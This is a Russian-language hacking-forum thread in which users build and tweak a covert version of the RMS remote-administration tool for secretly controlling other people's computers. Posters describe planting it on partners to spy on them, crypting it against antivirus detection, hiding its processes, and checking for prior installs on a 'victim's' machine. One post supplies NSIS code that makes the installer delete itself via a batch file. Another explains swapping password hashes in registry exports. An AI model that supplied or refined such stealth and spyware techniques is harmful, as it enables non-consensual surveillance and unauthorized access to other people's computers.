Скрытый RMS [удаленное администрирование]

Тема в разделе "Самое важное", создана пользователем sawyer1992, 25 фев 2011.

  1. wriwel
    wriwel Guest
    Все диоды, которые я встраивал в платы как индикаторы - работали полумеханически, т.е. при условии питания на камеру(реле) - включается диод. Есть неплохая вероятность нарваться на именно такую схему. ;) Тогда только жевачка поможет..
     
    13 фев 2013
  2. sv9t
    sv9t Новичок
    Симпатии:
    0
    Это понятно если диод работает только на питание тут уже никуда не деться, но как то встречал на форуме (не помню каком) там именно правилось через реестр. Пока собираю мало помалу...
     
    18 фев 2013
  3. bobobo
    bobobo Новичок
    Симпатии:
    0
    18 фев 2013
  4. faptobbly
    faptobbly Новичок
    Симпатии:
    0
    1) Народ а кто чей мануал использовал, Скандалиста ? или уже другой написали ?
    2) Чем отличается домашняя сборка RMS где генерируется ключ бесплатно, от платной версии ?
    P.S. Буду очень признателен если ответите !
     
    18 фев 2013
  5. sawyer1992
    sawyer1992 Новичок
    Симпатии:
    6
    сборка, конечно, детская, есть лучше вири конечно же..и размером в 3кб., да и криптовать её нужно постоянно.

    А этот вариант для тех у кого нет ни знаний, ничего, и вес к тому же огромный. Но, как вы наблюдаете, она вполне актуальна).. по неизвестным мне причинам :)

    ребят, кому действительно нужна помощь, по любым вопросам (по новым сборкам, по улучшению и т.п.) - не ленитесь, пишите мне (ТС-у) на почту: vinject@gmail.com
     
    18 фев 2013
  6. faptobbly
    faptobbly Новичок
    Симпатии:
    0
    sawyer1992
    лучше кроме darckomet ничего нету, не дури людей)
     
    18 фев 2013
  7. sawyer1992
    sawyer1992 Новичок
    Симпатии:
    6
    ты про darkcomet? да, согласен. особенно для васьки который захотел девушке подсунуть файл, или для девушки которая за парнем-нубом захотела пошпионить. и тут он(она) напаривается на мысль: НУЖНО КРИПТОВАТЬ - а ни денег, ни понимания что это нет, и времени нет, нужно сегодня и прямо сейчас. тогда и моя весом в 400кб подойдет. кому что по нужде..

    не дури людей? в чём я кого дурю??:))
    я два года назад потратил на это часа четыре со своими минимальными знаниями чтоб как-то оформить, и написать этот мануал, выложил для всех за-просто-так)
    я даже не понял о чём ты говоришь, но это прозвучало как оскорбление:)
     
    18 фев 2013
  8. SX2
    SX2 Новичок
    Симпатии:
    0
    Подскажите кто нибудь содержимое set.reg
     
    19 фев 2013
  9. bobobo
    bobobo Новичок
    Симпатии:
    0
    SX2,
    Все настройки сервера (порт, привязка к сетевому интерфейсу и другие) хранятся в системном реестре. Вы можете скопировать эти настройки с одного компьютера на другой.


    • Запустите стандартный редактор реестра Windows (c:\windows\regedit.exe).
    • Экспортируйте раздел реестра HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters в файл, например settings.reg.
    • На машине, где нужно установить R-Server выполните команду regedit.exe /s путь_к_файлу\settings.reg
     
    19 фев 2013
  10. A-L-I-E-N
    A-L-I-E-N Новичок
    Симпатии:
    5
    Scalpel. Уважаемый, а как правильно сделать самоудаление той сборки, которую генерирует Ваш билдер?
     
    21 фев 2013
  11. wald78
    wald78 Новичок
    Симпатии:
    1
    Доброго времени суток! если утерян пароль от RMS - сервера, можно ли его как то восстановить??? и можно ли вообще поменять на свой пароль, после установки RMS???
     
    Последнее редактирование: 21 фев 2013
    21 фев 2013
  12. scandalist
    scandalist Новичок
    Симпатии:
    3
    Думаю, что можно сделать так. Экспортируем настройки того сервера из реестра в файл .reg ставим на другой машине сервер той же версии со своим паролем, и тоже экспортируем в .reg Открываем оба файла hex редактором и меняем кусок файла с хэшем пароля (128 байт) из нашего файла в тот. Далее импортируем измененный файл. Если хэш не привязан к железу, а он похоже не привязан, так как на разных машинах и ОС хэш совпал у меня. Если там нет какой-либо проверки целостности настроек, то после перезапуска сервера, он примет наш новый пароль. Ничего не гарантирую, попробуйте и отпишитесь.
     
    22 фев 2013
  13. A-L-I-E-N
    A-L-I-E-N Новичок
    Симпатии:
    5
    А скрытие процессов на Windows 7 64 действительно не работает.
    А всё из-за того, что dllhost.exe : "This program must be run under Win32"
     
    23 фев 2013
  14. skynet46
    skynet46 Новичок
    Симпатии:
    0
    РЕбят,выручаете не могу понять в чем дело =( тестил на более 5компах приходит письмо с ip,но при попытки соеденится с ними он пишет,что они не в сети,в чем проблема!!!??? а к себе коннектиться,тоже по иду и поролю с почты.
     
    23 фев 2013
  15. scalpel
    scalpel Новичок
    Симпатии:
    4
    Достаточно вставить в конец build.nsi вот этот простенький код например:
    Код:
    Section "selfdel"
            System::Call 'kernel32::GetModuleFileName(i 0, t.R0, i 1024)'
            System::Call 'kernel32::GetShortPathName(t R0,t.R2,i 1024)'
            System::Call 'shell32::StrRChr(tR2,i 0,i0x5c) t.R3'
            StrCpy $2 $R3 "" 1
            FileOpen $R1 "1.bat" w 
            FileWrite $R1 "@echo off&chcp 1251>nul$\r$\n"
            FileWrite $R1 "taskkill /f /im $2$\r$\n"
            FileWrite $R1 ":try$\r$\n"
            FileWrite $R1 "timeout /t 5$\r$\n"
            FileWrite $R1 "del $R2$\r$\n"
            FileWrite $R1 "if exist $R2 goto try$\r$\n"
            FileWrite $R1 "del 1.bat$\r$\n"
            FileClose $R1
            nsExec::Exec "1.bat"
    SectionEnd
    
    А вообще существует стандартный плагин SelfDel.dll
     
    26 фев 2013
  16. A-L-I-E-N
    A-L-I-E-N Новичок
    Симпатии:
    5
    Огромнейшее спасибо!

    А можно ли узнать, каким способом обфусцированы настройки в файлике "Config.nsh"? Или это вовсе не криптованный текст?

    И последнее. Как бы Вы запретили "установку" сборки, если на компьютере жертвы уже имеется установленная ранее сборка?

    Спасибо!
     
    27 фев 2013
  17. juzver
    juzver Новичок
    Симпатии:
    0
    Добрый день. Аналогичная ошибка. Не принимает пароль.
    Есть несколько вопросов:
    почему он везде одинаковый для разных ай-ди?
    как удалить установленный сервер?
    Спасибо.
     
    27 фев 2013
  18. scalpel
    scalpel Новичок
    Симпатии:
    4
    Config.nsh,это не обфусцированные настройки,а преобразованный для компиляции в среде "nsis" экспортированный раздел реестра "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters",по просту .reg файл,о чем было сказано в посте #629.Билдер парсит этот файл на наличие идентификатора и меняет на тот что сгенерировал,пароль же прописан заранее при настройке сервера.Перед тем как запустится серверу,эти вновь созданные настроики записываются в реестр и принимаются сервером после запуска.
    Поэтому мне не совсем понятно почему не подходит пасс потому,как у меня все четко.И еще,идентификатор нужно генерировать для каждого компа в отдельности.И еще скажу вам по секрету,я не пользуюсь RMC несмотря на многие его достоинства,которые напрочь прибиваются его недостатками.Все что было сделано мной выше,делалось лишь ради опыта и не более.
    Запретить установку можно несколькими способами,или скомбинировать их все вместе.Проверка запущенных процессов,по именам файлов,сервисов,заголовку окон и так далее.В build.nsi для этой сборки проверяется наличие файла сервера в заданной папке.
     
    Последнее редактирование: 27 фев 2013
    27 фев 2013
  19. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    152
    sawyer1992, еще раз сделаете так, как было, возможности редактировать свои посты у Вас более не будет.
    хотите оказывать какие то услуги по сборке/продаже ее модификаций и т.д - в раздел услуг, но не тут
     
    4 мар 2013
  20. sawyer1992
    sawyer1992 Новичок
    Симпатии:
    6
    Окей, спасибо, буду придерживаться правил форума.
    Статью отредактирую потом, как будет более правильно собрать сборку для минимального обнаружения АВ.
    Естественно не вас, Хулиган, а для новичков, это у вас целевая аудитория.
     
    4 мар 2013
Загрузка...